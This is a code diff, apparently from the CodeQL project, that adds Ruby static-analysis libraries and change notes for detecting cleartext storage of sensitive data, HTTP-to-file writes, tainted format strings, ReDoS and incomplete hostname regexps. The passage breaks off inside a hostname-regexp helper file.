-      // avoid safe values assigned to presumably unsafe names
-      not this instanceof NonCleartextPassword and
-      name.regexpMatch(maybePassword()) and
-      exists(Assignment a |
-        this.asExpr().getExpr() = a.getRightOperand() and
-        a.getLeftOperand().getAVariable().getName() = name
-      )
-    }
-
-    override string describe() { result = "an assignment to " + name }
-  }
-
-  /** A parameter that may contain a password. */
-  private class ParameterPasswordSource extends Source {
-    private string name;
-
-    ParameterPasswordSource() {
-      name.regexpMatch(maybePassword()) and
-      not this instanceof NonCleartextPassword and
-      exists(Parameter p, LocalVariable v |
-        v = p.getAVariable() and
-        v.getName() = name and
-        this.asExpr().getExpr() = v.getAnAccess()
-      )
-    }
-
-    override string describe() { result = "a parameter " + name }
-  }
-
-  /** A call that might return a password. */
-  private class CallPasswordSource extends DataFlow::CallNode, Source {
-    private string name;
-
-    CallPasswordSource() {
-      name = this.getMethodName() and
-      name.regexpMatch("(?is)getPassword")
-    }
-
-    override string describe() { result = "a call to " + name }
-  }
-
  private string commonLogMethodName() {
    result = ["info", "debug", "warn", "warning", "error", "log"]
  }

-  /** Holds if `nodeFrom` taints `nodeTo`. */
-  predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
-    exists(string name, ElementReference ref, LocalVariable hashVar |
-      // from `hsh[password] = "changeme"` to a `hsh[password]` read
-      nodeFrom.(HashKeyWritePasswordSource).getName() = name and
-      nodeTo.asExpr().getExpr() = ref and
-      ref.getArgument(0).getConstantValue().getStringOrSymbol() = name and
-      nodeFrom.(HashKeyWritePasswordSource).getVariable() = hashVar and
-      ref.getReceiver().(VariableReadAccess).getVariable() = hashVar and
-      nodeFrom.asExpr().getASuccessor*() = nodeTo.asExpr()
-    )
-  }
-
  /**
   * A node representing an expression whose value is logged.
   */
--- a/ruby/ql/lib/codeql/ruby/security/CleartextStorageCustomizations.qll
+++ b/ruby/ql/lib/codeql/ruby/security/CleartextStorageCustomizations.qll
@@ -0,0 +1,49 @@
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * cleartext storage of sensitive information, as well as extension points for
+ * adding your own.
+ */
+
+private import ruby
+private import codeql.ruby.DataFlow
+private import codeql.ruby.Concepts
+private import internal.CleartextSources
+
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * cleartext storage of sensitive information, as well as extension points for
+ * adding your own.
+ */
+module CleartextStorage {
+  /**
+   * A data flow source for cleartext storage of sensitive information.
+   */
+  class Source = CleartextSources::Source;
+
+  /**
+   * A sanitizer for cleartext storage of sensitive information.
+   */
+  class Sanitizer = CleartextSources::Sanitizer;
+
+  /** Holds if `nodeFrom` taints `nodeTo`. */
+  predicate isAdditionalTaintStep = CleartextSources::isAdditionalTaintStep/2;
+
+  /**
+   * A data flow sink for cleartext storage of sensitive information.
+   */
+  abstract class Sink extends DataFlow::Node { }
+
+  /**
+   * A node representing data written to the filesystem.
+   */
+  private class FileSystemWriteAccessDataNodeAsSink extends Sink {
+    FileSystemWriteAccessDataNodeAsSink() { this = any(FileSystemWriteAccess write).getADataNode() }
+  }
+
+  /**
+   * A node representing data written to a persistent data store.
+   */
+  private class PersistentWriteAccessAsSink extends Sink {
+    PersistentWriteAccessAsSink() { this = any(PersistentWriteAccess write).getValue() }
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/security/CleartextStorageQuery.qll
+++ b/ruby/ql/lib/codeql/ruby/security/CleartextStorageQuery.qll
@@ -0,0 +1,33 @@
+/**
+ * Provides a taint-tracking configuration for "Clear-text storage of sensitive information".
+ *
+ * Note, for performance reasons: only import this file if
+ * `Configuration` is needed, otherwise `CleartextStorageCustomizations` should be
+ * imported instead.
+ */
+
+private import ruby
+private import codeql.ruby.DataFlow
+private import codeql.ruby.TaintTracking
+private import CleartextStorageCustomizations::CleartextStorage as CleartextStorage
+
+/**
+ * A taint-tracking configuration for detecting "Clear-text storage of sensitive information".
+ */
+class Configuration extends TaintTracking::Configuration {
+  Configuration() { this = "CleartextStorage" }
+
+  override predicate isSource(DataFlow::Node source) { source instanceof CleartextStorage::Source }
+
+  override predicate isSink(DataFlow::Node sink) { sink instanceof CleartextStorage::Sink }
+
+  override predicate isSanitizer(DataFlow::Node node) {
+    super.isSanitizer(node)
+    or
+    node instanceof CleartextStorage::Sanitizer
+  }
+
+  override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
+    CleartextStorage::isAdditionalTaintStep(nodeFrom, nodeTo)
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessCustomizations.qll
+++ b/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessCustomizations.qll
@@ -0,0 +1,34 @@
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * writing user-controlled data to files, as well as extension points
+ * for adding your own.
+ */
+
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * writing user-controlled data to files, as well as extension points
+ * for adding your own.
+ */
+module HttpToFileAccess {
+  import HttpToFileAccessSpecific
+
+  /**
+   * A data flow source for writing user-controlled data to files.
+   */
+  abstract class Source extends DataFlow::Node { }
+
+  /**
+   * A data flow sink for writing user-controlled data to files.
+   */
+  abstract class Sink extends DataFlow::Node { }
+
+  /**
+   * A sanitizer for writing user-controlled data to files.
+   */
+  abstract class Sanitizer extends DataFlow::Node { }
+
+  /** A data node of a file system write access, considered as a sink. */
+  class FileAccessAsSink extends Sink {
+    FileAccessAsSink() { this = any(FileSystemWriteAccess write).getADataNode() }
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessQuery.qll
+++ b/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessQuery.qll
@@ -0,0 +1,25 @@
+/**
+ * Provides a taint tracking configuration for reasoning about writing user-controlled data to files.
+ *
+ * Note, for performance reasons: only import this file if
+ * `Configuration` is needed, otherwise
+ * `HttpToFileAccessCustomizations` should be imported instead.
+ */
+
+private import HttpToFileAccessCustomizations::HttpToFileAccess
+
+/**
+ * A taint tracking configuration for writing user-controlled data to files.
+ */
+class Configuration extends TaintTracking::Configuration {
+  Configuration() { this = "HttpToFileAccess" }
+
+  override predicate isSource(DataFlow::Node source) { source instanceof Source }
+
+  override predicate isSink(DataFlow::Node sink) { sink instanceof Sink }
+
+  override predicate isSanitizer(DataFlow::Node node) {
+    super.isSanitizer(node) or
+    node instanceof Sanitizer
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessSpecific.qll
+++ b/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessSpecific.qll
@@ -0,0 +1,21 @@
+/**
+ * Provides imports and classes needed for `HttpToFileAccessQuery` and `HttpToFileAccessCustomizations`.
+ */
+
+import ruby
+import codeql.ruby.DataFlow
+import codeql.ruby.dataflow.RemoteFlowSources
+import codeql.ruby.Concepts
+import codeql.ruby.TaintTracking
+private import HttpToFileAccessCustomizations::HttpToFileAccess
+
+/**
+ * An access to a user-controlled HTTP request input, considered as a flow source for writing user-controlled data to files.
+ */
+private class RequestInputAccessAsSource extends Source instanceof HTTP::Server::RequestInputAccess {
+}
+
+/** The response body of an outgoing HTTP request, considered as a flow source for writing user-controlled data to files. */
+private class HttpResponseAsSource extends Source {
+  HttpResponseAsSource() { exists(HTTP::Client::Request req | this = req.getResponseBody()) }
+}
--- a/ruby/ql/lib/codeql/ruby/security/TaintedFormatStringCustomizations.qll
+++ b/ruby/ql/lib/codeql/ruby/security/TaintedFormatStringCustomizations.qll
@@ -0,0 +1,43 @@
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * format injections, as well as extension points for adding your own.
+ */
+
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * format injections, as well as extension points for adding your own.
+ */
+module TaintedFormatString {
+  import TaintedFormatStringSpecific
+
+  /**
+   * A data flow source for format injections.
+   */
+  abstract class Source extends DataFlow::Node { }
+
+  /**
+   * A data flow sink for format injections.
+   */
+  abstract class Sink extends DataFlow::Node { }
+
+  /**
+   * A sanitizer for format injections.
+   */
+  abstract class Sanitizer extends DataFlow::Node { }
+
+  /** A source of remote user input, considered as a flow source for format injection. */
+  class RemoteSource extends Source instanceof RemoteFlowSource { }
+
+  /**
+   * A format argument to a printf-like function, considered as a flow sink for format injection.
+   */
+  class FormatSink extends Sink {
+    FormatSink() {
+      exists(PrintfStyleCall printf |
+        this = printf.getFormatString() and
+        // exclude trivial case where there are no arguments to interpolate
+        exists(printf.getFormatArgument(_))
+      )
+    }
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/security/TaintedFormatStringQuery.qll
+++ b/ruby/ql/lib/codeql/ruby/security/TaintedFormatStringQuery.qll
@@ -0,0 +1,27 @@
+/**
+ * Provides a taint-tracking configuration for reasoning about format
+ * injections.
+ *
+ *
+ * Note, for performance reasons: only import this file if
+ * `Configuration` is needed, otherwise
+ * `TaintedFormatStringCustomizations` should be imported instead.
+ */
+
+private import TaintedFormatStringCustomizations::TaintedFormatString
+
+/**
+ * A taint-tracking configuration for format injections.
+ */
+class Configuration extends TaintTracking::Configuration {
+  Configuration() { this = "TaintedFormatString" }
+
+  override predicate isSource(DataFlow::Node source) { source instanceof Source }
+
+  override predicate isSink(DataFlow::Node sink) { sink instanceof Sink }
+
+  override predicate isSanitizer(DataFlow::Node node) {
+    super.isSanitizer(node) or
+    node instanceof Sanitizer
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/security/TaintedFormatStringSpecific.qll
+++ b/ruby/ql/lib/codeql/ruby/security/TaintedFormatStringSpecific.qll
@@ -0,0 +1,71 @@
+/**
+ * Provides Ruby-specific imports and classes needed for `TaintedFormatStringQuery` and `TaintedFormatStringCustomizations`.
+ */
+
+import ruby
+import codeql.ruby.DataFlow
+import codeql.ruby.dataflow.RemoteFlowSources
+import codeql.ruby.ApiGraphs
+import codeql.ruby.TaintTracking
+private import codeql.ruby.frameworks.Files::IO
+private import codeql.ruby.controlflow.CfgNodes
+
+/**
+ * A call to `printf` or `sprintf`.
+ */
+abstract class PrintfStyleCall extends DataFlow::CallNode {
+  // We assume that most printf-like calls have the signature f(format_string, args...)
+  /**
+   * Gets the format string of this call.
+   */
+  DataFlow::Node getFormatString() { result = this.getArgument(0) }
+
+  /**
+   * Gets the `n`th formatted argument of this call.
+   */
+  DataFlow::Node getFormatArgument(int n) { n >= 0 and result = this.getArgument(n + 1) }
+}
+
+/**
+ * A call to `Kernel.printf`, or an `UnknownMethodCall` named `printf`.
+ */
+class KernelPrintfCall extends PrintfStyleCall {
+  KernelPrintfCall() {
+    this.getMethodName() = "printf" and
+    this.asExpr().getExpr() instanceof UnknownMethodCall
+    or
+    this = API::getTopLevelMember("Kernel").getAMethodCall("printf")
+  }
+
+  // Two call shapes are possible for Kernel#printf:
+  //   printf(io, string, ...)
+  //   printf(string, ...)
+  override DataFlow::Node getFormatString() {
+    // The position of the format string therefore depends on the call shape,
+    // which cannot be determined in general. Heuristic: a first argument with a
+    // constant string value is taken to be the format string; in every other
+    // case both the first and the second argument are reported.
+    if this.getArgument(0).getExprNode().getConstantValue().isString(_)
+    then result = this.getArgument(0)
+    else result = this.getArgument([0, 1])
+  }
+}
+
+/**
+ * A call to `Kernel.sprintf`, or an `UnknownMethodCall` named `sprintf`.
+ */
+class KernelSprintfCall extends PrintfStyleCall {
+  KernelSprintfCall() {
+    this.getMethodName() = "sprintf" and
+    this.asExpr().getExpr() instanceof UnknownMethodCall
+    or
+    this = API::getTopLevelMember("Kernel").getAMethodCall("sprintf")
+  }
+}
+
+/**
+ * A `printf` call whose receiver is an `IOInstance`.
+ */
+class IOPrintfCall extends PrintfStyleCall {
+  IOPrintfCall() { this.getMethodName() = "printf" and this.getReceiver() instanceof IOInstance }
+}
--- a/ruby/ql/lib/codeql/ruby/security/internal/CleartextSources.qll
+++ b/ruby/ql/lib/codeql/ruby/security/internal/CleartextSources.qll
@@ -0,0 +1,275 @@
+/**
+ * Provides default sources and sanitizers for reasoning about data flow from
+ * sources of sensitive information, as well as extension points for adding
+ * your own sources and sanitizers.
+ */
+
+private import ruby
+private import codeql.ruby.DataFlow
+private import codeql.ruby.TaintTracking::TaintTracking
+private import codeql.ruby.dataflow.RemoteFlowSources
+private import SensitiveDataHeuristics::HeuristicNames
+private import codeql.ruby.CFG
+private import codeql.ruby.dataflow.SSA
+
+/**
+ * Provides default sources and sanitizers for reasoning about data flow from
+ * sources of sensitive information, as well as extension points for adding
+ * your own sources and sanitizers.
+ */
+module CleartextSources {
+  /**
+   * A data flow source of cleartext sensitive information.
+   */
+  abstract class Source extends DataFlow::Node {
+    /** Gets a string that describes the type of this data flow source. */
+    abstract string describe();
+  }
+
+  /**
+   * A sanitizer for cleartext sensitive information.
+   */
+  abstract class Sanitizer extends DataFlow::Node { }
+
+  /**
+   * Holds if `re` may be a regular expression that can be used to sanitize
+   * sensitive data with a call to `sub`.
+   */
+  private predicate effectiveSubRegExp(CfgNodes::ExprNodes::RegExpLiteralCfgNode re) {
+    re.getConstantValue().getStringOrSymbol().matches([".*", ".+"])
+  }
+
+  /**
+   * Holds if `re` may be a regular expression that can be used to sanitize
+   * sensitive data with a call to `gsub`.
+   */
+  private predicate effectiveGsubRegExp(CfgNodes::ExprNodes::RegExpLiteralCfgNode re) {
+    re.getConstantValue().getStringOrSymbol().matches(".")
+  }
+
+  /**
+   * A call to `sub`/`sub!` or `gsub`/`gsub!` that seems to mask sensitive information.
+   */
+  private class MaskingReplacerSanitizer extends Sanitizer, DataFlow::CallNode {
+    MaskingReplacerSanitizer() {
+      exists(CfgNodes::ExprNodes::RegExpLiteralCfgNode re |
+        re = this.getArgument(0).asExpr() and
+        (
+          this.getMethodName() = ["sub", "sub!"] and effectiveSubRegExp(re)
+          or
+          this.getMethodName() = ["gsub", "gsub!"] and effectiveGsubRegExp(re)
+        )
+      )
+    }
+  }
+
+  /**
+   * Like `MaskingReplacerSanitizer` but updates the receiver for methods that
+   * sanitize the receiver.
+   * Taint is thereby cleared for any subsequent read.
+   */
+  private class InPlaceMaskingReplacerSanitizer extends Sanitizer {
+    InPlaceMaskingReplacerSanitizer() {
+      exists(MaskingReplacerSanitizer m | m.getMethodName() = ["gsub!", "sub!"] |
+        m.getReceiver() = this
+      )
+    }
+  }
+
+  /**
+   * Holds if `name` is for a method or variable that appears, syntactically, to
+   * not be sensitive.
+   */
+  bindingset[name]
+  predicate nameIsNotSensitive(string name) {
+    name.regexpMatch(notSensitiveRegexp()) and
+    // By default `notSensitiveRegexp()` includes some false positives for
+    // common ruby method names that are not necessarily non-sensitive.
+    // We explicitly exclude element references, element assignments, and
+    // mutation methods.
+    not name = ["[]", "[]="] and
+    not name.matches("%!")
+  }
+
+  /**
+   * A call that might obfuscate a password, for example through hashing.
+   */
+  private class ObfuscatorCall extends Sanitizer, DataFlow::CallNode {
+    ObfuscatorCall() { nameIsNotSensitive(this.getMethodName()) }
+  }
+
+  /**
+   * A data flow node that does not contain a clear-text password, according to its syntactic name.
+   */
+  private class NameGuidedNonCleartextPassword extends NonCleartextPassword {
+    NameGuidedNonCleartextPassword() {
+      exists(string name | nameIsNotSensitive(name) |
+        // accessing a non-sensitive variable
+        this.asExpr().getExpr().(VariableReadAccess).getVariable().getName() = name
+        or
+        // dereferencing a non-sensitive field
+        this.asExpr()
+            .(CfgNodes::ExprNodes::ElementReferenceCfgNode)
+            .getArgument(0)
+            .getConstantValue()
+            .getStringOrSymbol() = name
+        or
+        // calling a non-sensitive method
+        this.(DataFlow::CallNode).getMethodName() = name
+      )
+      or
+      // avoid i18n strings
+      this.asExpr()
+          .(CfgNodes::ExprNodes::ElementReferenceCfgNode)
+          .getReceiver()
+          .getConstantValue()
+          .getStringOrSymbol()
+          .regexpMatch("(?is).*(messages|strings).*")
+    }
+  }
+
+  /**
+   * A data flow node that receives flow that is not a clear-text password.
+   */
+  class NonCleartextPasswordFlow extends NonCleartextPassword {
+    NonCleartextPasswordFlow() {
+      any(NonCleartextPassword other).(DataFlow::LocalSourceNode).flowsTo(this)
+    }
+  }
+
+  /**
+   * A data flow node that does not contain a clear-text password.
+   */
+  abstract private class NonCleartextPassword extends DataFlow::Node { }
+
+  // `writeNode` assigns pair with key `name` to `val`
+  private predicate hashKeyWrite(DataFlow::CallNode writeNode, string name, DataFlow::Node val) {
+    writeNode.asExpr().getExpr() instanceof SetterMethodCall and
+    // hash[name]
+    writeNode.getArgument(0).asExpr().getConstantValue().getStringOrSymbol() = name and
+    // val
+    writeNode.getArgument(1).asExpr().(CfgNodes::ExprNodes::AssignExprCfgNode).getRhs() =
+      val.asExpr()
+  }
+
+  /**
+   * A write to a hash entry with a value that may contain password information.
+   */
+  private class HashKeyWritePasswordSource extends Source {
+    private string name;
+    private DataFlow::ExprNode recv;
+
+    HashKeyWritePasswordSource() {
+      exists(DataFlow::Node val |
+        name.regexpMatch(maybePassword()) and
+        not nameIsNotSensitive(name) and
+        // avoid safe values assigned to presumably unsafe names
+        not val instanceof NonCleartextPassword and
+        (
+          // hash[name] = val
+          hashKeyWrite(this, name, val) and
+          recv = this.(DataFlow::CallNode).getReceiver()
+        )
+      )
+    }
+
+    override string describe() { result = "a write to " + name }
+
+    /** Gets the name of the key. */
+    string getName() { result = name }
+
+    /**
+     * Gets the local variable for the hash that this password source writes
+     * to, if applicable.
+     */
+    LocalVariable getVariable() {
+      result = recv.getExprNode().getExpr().(VariableReadAccess).getVariable()
+    }
+  }
+
+  /**
+   * A hash literal with an entry that may contain a password.
+   */
+  private class HashLiteralPasswordSource extends Source {
+    private string name;
+
+    HashLiteralPasswordSource() {
+      exists(DataFlow::Node val, CfgNodes::ExprNodes::HashLiteralCfgNode lit |
+        name.regexpMatch(maybePassword()) and
+        not nameIsNotSensitive(name) and
+        // avoid safe values assigned to presumably unsafe names
+        not val instanceof NonCleartextPassword and
+        // hash = { name: val }
+        exists(CfgNodes::ExprNodes::PairCfgNode p |
+          this.asExpr() = lit and p = lit.getAKeyValuePair()
+        |
+          p.getKey().getConstantValue().getStringOrSymbol() = name and
+          p.getValue() = val.asExpr()
+        )
+      )
+    }
+
+    override string describe() { result = "a write to " + name }
+  }
+
+  /** An assignment that may assign a password to a variable. */
+  private class AssignPasswordVariableSource extends Source {
+    string name;
+
+    AssignPasswordVariableSource() {
+      // avoid safe values assigned to presumably unsafe names
+      not this instanceof NonCleartextPassword and
+      name.regexpMatch(maybePassword()) and
+      not nameIsNotSensitive(name) and
+      exists(Assignment a |
+        this.asExpr().getExpr() = a.getRightOperand() and
+        a.getLeftOperand().getAVariable().getName() = name
+      )
+    }
+
+    override string describe() { result = "an assignment to " + name }
+  }
+
+  /** A parameter that may contain a password. */
+  private class ParameterPasswordSource extends Source {
+    private string name;
+
+    ParameterPasswordSource() {
+      name.regexpMatch(maybePassword()) and
+      not nameIsNotSensitive(name) and
+      not this instanceof NonCleartextPassword and
+      exists(Parameter p, LocalVariable v |
+        v = p.getAVariable() and
+        v.getName() = name and
+        this.asExpr().getExpr() = v.getAnAccess()
+      )
+    }
+
+    override string describe() { result = "a parameter " + name }
+  }
+
+  /** A call that might return a password. */
+  private class CallPasswordSource extends DataFlow::CallNode, Source {
+    private string name;
+
+    CallPasswordSource() {
+      name = this.getMethodName() and
+      name.regexpMatch("(?is)getPassword")
+    }
+
+    override string describe() { result = "a call to " + name }
+  }
+
+  /** Holds if `nodeFrom` taints `nodeTo`. */
+  predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
+    exists(string name, ElementReference ref, LocalVariable hashVar |
+      // from `hsh[password] = "changeme"` to a `hsh[password]` read
+      nodeFrom.(HashKeyWritePasswordSource).getName() = name and
+      nodeTo.asExpr().getExpr() = ref and
+      ref.getArgument(0).getConstantValue().getStringOrSymbol() = name and
+      nodeFrom.(HashKeyWritePasswordSource).getVariable() = hashVar and
+      ref.getReceiver().(VariableReadAccess).getVariable() = hashVar and
+      nodeFrom.asExpr().getASuccessor*() = nodeTo.asExpr()
+    )
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/security/internal/SensitiveDataHeuristics.qll
+++ b/ruby/ql/lib/codeql/ruby/security/internal/SensitiveDataHeuristics.qll
@@ -98,7 +98,8 @@ module HeuristicNames {
   * suggesting nouns within the string do not represent the meaning of the whole string (e.g. a URL or a SQL query).
   */
  string notSensitiveRegexp() {
-    result = "(?is).*([^\\w$.-]|redact|censor|obfuscate|hash|md5|sha|((?<!un)(en))?(crypt|code)).*"
+    result =
+      "(?is).*([^\\w$.-]|redact|censor|obfuscate|hash|md5|sha|random|((?<!un)(en))?(crypt|code)).*"
  }

  /**
--- a/ruby/ql/lib/codeql/ruby/security/performance/ExponentialBackTracking.qll
+++ b/ruby/ql/lib/codeql/ruby/security/performance/ExponentialBackTracking.qll
@@ -1,9 +1,5 @@
-private import ReDoSUtil
-private import RegExpTreeView
-private import codeql.Locations
-
-/*
- * This query implements the analysis described in the following two papers:
+/**
+ * This library implements the analysis described in the following two papers:
 *
 *   James Kirrage, Asiri Rathnayake, Hayo Thielecke: Static Analysis for
 *     Regular Expression Denial-of-Service Attacks. NSS 2013.
@@ -31,9 +27,9 @@ private import codeql.Locations
 * condition is equivalent to saying that `(q, q)` is reachable from `(r1, r2)`
 * in the product NFA.
 *
- * This is what the query does. It makes a simple attempt to construct a
+ * This is what the library does. It makes a simple attempt to construct a
 * prefix `v` leading into `q`, but only to improve the alert message.
- * And the query tries to prove the existence of a suffix that ensures
+ * And the library tries to prove the existence of a suffix that ensures
 * rejection. This check might fail, which can cause false positives.
 *
 * Finally, sometimes it depends on the translation whether the NFA generated
@@ -41,7 +37,7 @@ private import codeql.Locations
 * particular translation, which may result in false positives or negatives
 * relative to some particular JavaScript engine.
 *
- * More precisely, the query constructs an NFA from a regular expression `r`
+ * More precisely, the library constructs an NFA from a regular expression `r`
 * as follows:
 *
 *   * Every sub-term `t` gives rise to an NFA state `Match(t,i)`, representing
@@ -66,6 +62,8 @@ private import codeql.Locations
 *     a suffix `x` (possible empty) that is most likely __not__ accepted.
 */

+import ReDoSUtil
+
 /**
 * Holds if state `s` might be inside a backtracking repetition.
 */
@@ -90,18 +88,19 @@ private class MaybeBacktrackingRepetition extends InfiniteRepetitionQuantifier {

 /**
 * A state in the product automaton.
- *
- * We lazily only construct those states that we are actually
- * going to need: `(q, q)` for every fork state `q`, and any
- * pair of states that can be reached from a pair that we have
- * already constructed. To cut down on the number of states,
- * we only represent states `(q1, q2)` where `q1` is lexicographically
- * no bigger than `q2`.
- *
- * States are only constructed if both states in the pair are
- * inside a repetition that might backtrack.
 */
 private newtype TStatePair =
+  /**
+   * We lazily only construct those states that we are actually
+   * going to need: `(q, q)` for every fork state `q`, and any
+   * pair of states that can be reached from a pair that we have
+   * already constructed. To cut down on the number of states,
+   * we only represent states `(q1, q2)` where `q1` is lexicographically
+   * no bigger than `q2`.
+   *
+   * States are only constructed if both states in the pair are
+   * inside a repetition that might backtrack.
+   */
  MkStatePair(State q1, State q2) {
    isFork(q1, _, _, _, _) and q2 = q1
    or
--- a/ruby/ql/lib/codeql/ruby/security/performance/ParseRegExp.qll
+++ b/ruby/ql/lib/codeql/ruby/security/performance/ParseRegExp.qll
@@ -8,9 +8,9 @@
 private import codeql.ruby.ast.Literal as AST
 private import codeql.Locations
 private import codeql.ruby.DataFlow
-private import codeql.ruby.TaintTracking
-private import codeql.ruby.typetracking.TypeTracker
+private import codeql.ruby.controlflow.CfgNodes
 private import codeql.ruby.ApiGraphs
+private import codeql.ruby.dataflow.internal.tainttrackingforlibraries.TaintTrackingImpl

 /**
 * A `StringlikeLiteral` containing a regular expression term, that is, either
@@ -480,6 +480,7 @@ abstract class RegExp extends AST::StringlikeLiteral {
  /** Gets the number of the group in start,end */
  int getGroupNumber(int start, int end) {
    this.group(start, end) and
+    not this.nonCapturingGroupStart(start, _) and
    result =
      count(int i | this.group(i, _) and i < start and not this.nonCapturingGroupStart(i, _)) + 1
  }
@@ -583,7 +584,7 @@ abstract class RegExp extends AST::StringlikeLiteral {
  private predicate nonCapturingGroupStart(int start, int end) {
    this.isGroupStart(start) and
    this.getChar(start + 1) = "?" and
-    this.getChar(start + 2) = ":" and
+    this.getChar(start + 2) = [":", "=", "<", "!", "#"] and
    end = start + 3
  }

@@ -992,25 +993,35 @@ private predicate isInterpretedAsRegExp(DataFlow::Node source) {
  // The argument of a call that coerces the argument to a regular expression.
  exists(DataFlow::CallNode mce |
    mce.getMethodName() = ["match", "match?"] and
-    source = mce.getArgument(0)
+    source = mce.getArgument(0) and
+    // exclude https://ruby-doc.org/core-2.4.0/Regexp.html#method-i-match
+    not mce.getReceiver().asExpr().getExpr() instanceof AST::RegExpLiteral
  )
 }

-/**
- * Gets a node whose value may flow (inter-procedurally) to `re`, where it is interpreted
- * as a part of a regular expression.
- */
-private DataFlow::Node regExpSource(DataFlow::Node re, TypeBackTracker t) {
-  t.start() and
-  re = result and
-  isInterpretedAsRegExp(result)
-  or
-  exists(TypeBackTracker t2, DataFlow::Node succ | succ = regExpSource(re, t2) |
-    t2 = t.smallstep(result, succ)
-    or
-    TaintTracking::localTaintStep(result, succ) and
-    t = t2
-  )
+private class RegExpConfiguration extends Configuration {
+  RegExpConfiguration() { this = "RegExpConfiguration" }
+
+  override predicate isSource(DataFlow::Node source) {
+    source.asExpr() =
+      any(ExprCfgNode e |
+        e.getConstantValue().isString(_) and
+        not e instanceof ExprNodes::VariableReadAccessCfgNode and
+        not e instanceof ExprNodes::ConstantReadAccessCfgNode
+      )
+  }
+
+  override predicate isSink(DataFlow::Node sink) { isInterpretedAsRegExp(sink) }
+
+  override predicate isSanitizer(DataFlow::Node node) {
+    // stop flow if `node` is receiver of
+    // https://ruby-doc.org/core-2.4.0/String.html#method-i-match
+    exists(DataFlow::CallNode mce |
+      mce.getMethodName() = ["match", "match?"] and
+      node = mce.getReceiver() and
+      mce.getArgument(0).asExpr().getExpr() instanceof AST::RegExpLiteral
+    )
+  }
 }

 /**
@@ -1018,4 +1029,6 @@ private DataFlow::Node regExpSource(DataFlow::Node re, TypeBackTracker t) {
 * as a part of a regular expression.
 */
 cached
-DataFlow::Node regExpSource(DataFlow::Node re) { result = regExpSource(re, TypeBackTracker::end()) }
+DataFlow::Node regExpSource(DataFlow::Node re) {
+  exists(RegExpConfiguration c | c.hasFlow(result, re))
+}
--- a/ruby/ql/lib/codeql/ruby/security/performance/RegExpTreeView.qll
+++ b/ruby/ql/lib/codeql/ruby/security/performance/RegExpTreeView.qll
@@ -60,6 +60,19 @@ module RegExpFlags {
  }
 }

+/**
+ * Provides utility predicates related to regular expressions.
+ */
+module RegExpPatterns {
+  /**
+   * Gets a pattern that matches common top-level domain names in lower case.
+   */
+  string getACommonTld() {
+    // according to ranking by http://google.com/search?q=site:.<<TLD>>
+    result = "(?:com|org|edu|gov|uk|net|io)(?![a-z0-9])"
+  }
+}
+
 /**
 * An element containing a regular expression term, that is, either
 * a string literal (parsed as a regular expression)
@@ -385,6 +398,8 @@ class RegExpAlt extends RegExpTerm, TRegExpAlt {
  override string getAPrimaryQlClass() { result = "RegExpAlt" }
 }

+class RegExpCharEscape = RegExpEscape;
+
 class RegExpEscape extends RegExpNormalChar {
  RegExpEscape() { re.escapedCharacter(start, end) }

@@ -593,6 +608,9 @@ class RegExpGroup extends RegExpTerm, TRegExpGroup {
   */
  int getNumber() { result = re.getGroupNumber(start, end) }

+  /** Holds if this is a capture group. */
+  predicate isCapture() { exists(this.getNumber()) }
+
  /** Holds if this is a named capture group. */
  predicate isNamed() { exists(this.getName()) }

--- a/ruby/ql/src/change-notes/2022-02-10-incomplete-hostname-regexp.md
+++ b/ruby/ql/src/change-notes/2022-02-10-incomplete-hostname-regexp.md
@@ -0,0 +1,4 @@
+---
+category: newQuery
+---
+* Added a new query, `rb/incomplete-hostname-regexp`. The query finds instances where a hostname is incompletely sanitized due to an unescaped character in a regular expression.
--- a/ruby/ql/src/change-notes/2022-02-23-rb-http-to-file-access.md
+++ b/ruby/ql/src/change-notes/2022-02-23-rb-http-to-file-access.md
@@ -0,0 +1,4 @@
+---
+category: newQuery
+---
+* Added a new query, `rb/http-to-file-access`. The query finds cases where data from remote user input is written to a file.
--- a/ruby/ql/src/change-notes/2022-03-05-rb-clear-text-storage-sensitive-data.md
+++ b/ruby/ql/src/change-notes/2022-03-05-rb-clear-text-storage-sensitive-data.md
@@ -0,0 +1,4 @@
+---
+category: newQuery
+---
+* Added a new query, `rb/clear-text-storage-sensitive-data`. The query finds cases where sensitive information, such as user credentials, is stored as cleartext.
--- a/ruby/ql/src/change-notes/2022-03-10-rb-tainted-format-string.md
+++ b/ruby/ql/src/change-notes/2022-03-10-rb-tainted-format-string.md
@@ -0,0 +1,4 @@
+---
+category: newQuery
+---
+* Added a new query, `rb/tainted-format-string`. The query finds cases where data from remote user input is used in a string formatting method in a way that allows arbitrary format specifiers to be inserted.
--- a/ruby/ql/src/queries/security/cwe-020/HostnameRegexpShared.qll
+++ b/ruby/ql/src/queries/security/cwe-020/HostnameRegexpShared.qll
@@ -0,0 +1,202 @@
+/**
+ * Provides predicates for reasoning about regular expressions
+ * that match URLs and hostname patterns.
+ */
+
+private import HostnameRegexpSpecific
+
+/**
+ * Holds if the given constant is unlikely to occur in the origin part of a URL.
+ */
+predicate isConstantInvalidInsideOrigin(RegExpConstant term) {
+  // Look for any of these cases:
+  // - A character that can't occur in the origin
+  // - Two dashes in a row
+  // - A colon that is not part of port or scheme separator
+  // - A slash that is not part of scheme separator
+  term.getValue().regexpMatch(".*(?:[^a-zA-Z0-9.:/-]|--|:[^0-9/]|(?<![/:]|^)/).*")
+}
+
+/** Holds if `term` is a dot constant of form `\.` or `[.]`. */
+predicate isDotConstant(RegExpTerm term) {
